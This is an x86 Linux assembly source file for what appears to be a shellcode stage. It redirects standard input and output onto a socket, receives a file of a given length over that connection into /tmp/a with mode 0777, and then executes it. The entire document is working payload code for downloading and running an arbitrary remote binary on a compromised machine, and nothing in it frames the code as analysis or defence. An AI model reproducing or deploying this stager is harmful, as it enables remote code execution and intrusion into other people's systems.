.globl main main: call test_listen mov %eax, %esi # # Logic: # # 1) open file /tmp/a # 2) read length from fd (MSG_WAITALL) # 3) read file in chunks from fd # 4) write chunks to file # 5) close file # 6) execve # # Expects fd in esi upload_execute: sub $0x10, %esp mov %esp, %ebp xor %edi, %edi close_std_fds: xor %ebx, %ebx mov $0x6, %al int $0x80 inc %ebx mov $0x6, %al int $0x80 inc %ebx mov $0x6, %al int $0x80 dup_std_fds: mov %esi, %ebx lea 1(%edi), %ecx lea 63(%edi), %eax int $0x80 dec %ecx lea 63(%edi), %eax int $0x80 open_file: xor %edx, %edx xor %ecx, %ecx mov $0x42, %cl # O_CREAT | O_RDWR push %edx mov $0x612f, %bx push %ebx push $0x706d742f mov %esp, %ebx mov %ebx, 8(%ebp) lea 5(%edi), %eax # open syscall mov $0x1ff, %dx # 0777 int $0x80 mov %eax, 4(%ebp) # save fd recv_length: sub $0x4, %esp lea 255(%edi), %ebx inc %ebx push %ebx # MSG_WAITALL lea 4(%edi), %ebx push %ebx # 4 bytes lea 4(%esp), %ebx push %ebx # buffer push %esi # fd mov %esp, %ecx # socket structure lea 102(%edi), %eax # socket syscall lea 10(%edi), %ebx # recv call int $0x80 mov 12(%esp), %edx # save length in edx mmap_file: lea 90(%edi), %eax # mmap push %edi # offset push 4(%ebp) # fd lea 1(%edi), %ebx push %ebx # MAP_SHARED lea 3(%edi), %ebx push %ebx # PROT_WRITE | PROT_READ push %edx # length push %edi # null addr mov %esp, %ebx int $0x80 mov %eax, 12(%ebp) truncate_file: push %eax # save eax mov %edx, %ecx # length mov 4(%ebp), %ebx # file handle lea 93(%edi), %eax # ftruncate int $0x80 # interrupt pop %eax # restore eax recv_from_socket: lea 255(%edi), %ebx inc %ebx push %ebx # MSG_WAITALL push %edx # length from previous recv push %eax # buffer from mmap push %esi # fd mov %esp, %ecx # socket structure lea 102(%edi), %eax # socket syscall lea 10(%edi), %ebx # recv call int $0x80 munmap_file: mov 12(%ebp), %ebx mov %edx, %ecx lea 91(%edi), %eax int $0x80 close_fd: mov 4(%ebp), %ebx lea 6(%edi), %eax int $0x80 execve: xor %edx, %edx push %edx push 8(%ebp) mov %esp, %ecx mov (%esp), %ebx lea 11(%edi), %eax int $0x80 upload_execute_end: